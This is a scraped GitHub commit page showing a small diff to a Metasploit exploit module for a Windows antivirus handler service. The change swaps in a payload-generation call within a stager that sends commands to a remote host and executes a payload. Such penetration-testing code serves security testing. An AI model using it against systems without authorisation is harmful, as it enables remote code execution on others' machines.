We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent b862d24 commit 5cb8b9aCopy full SHA for 5cb8b9a
modules/exploits/windows/antivirus/ams_hndlrsvc.rb
@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
11
12
include Msf::Exploit::CmdStager
13
include Msf::Exploit::Remote::Tcp
14
+ include Msf::Exploit::EXE
15
16
def initialize(info = {})
17
super(update_info(info,
@@ -53,7 +54,7 @@ def initialize(info = {})
53
54
def windows_stager
55
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
56
execute_cmdstager({ :temp => '.' })
- @payload_exe = payload_exe
57
+ @payload_exe = generate_payload_exe
58
59
print_status("Attempting to execute the payload...")
60
execute_command(@payload_exe)
0 commit comments